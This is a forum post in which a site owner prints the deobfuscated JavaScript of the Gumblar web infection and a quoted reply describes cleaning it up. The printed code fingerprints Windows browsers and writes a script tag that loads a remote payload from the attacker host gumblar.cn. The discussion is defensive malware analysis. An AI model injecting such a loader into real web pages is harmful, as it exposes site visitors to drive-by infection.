The javascript resolves to the following.
The real damage (whatever that may be) is done by a script being called at gumblar dot cn. I dont really want to run the script just to find out what it does.
Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if( (u.indexOf("Win")>0) &&
(u.indexOf("NT 6")<0) &&
(document.cookie.indexOf("miek=1") < 0) &&
(typeof(zrvzts) != typeof("A"))) {
zrvzts="A";
eval("if(window."+a+") j = j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/?id="+j+">
<\/script>");
}
Quote:
Originally Posted by chrisJumbo
Had the very same problem. Thankfully we had good back-up, so for most of the files just uploaded versions without the script. The blog was harder, because the script was inserted in one of the main processing files. I found that by creating a new blog and comparing files.
I changed all passwords and so far have been free of a re-occurance. I told our host about the problem so they ran some scans as well.
|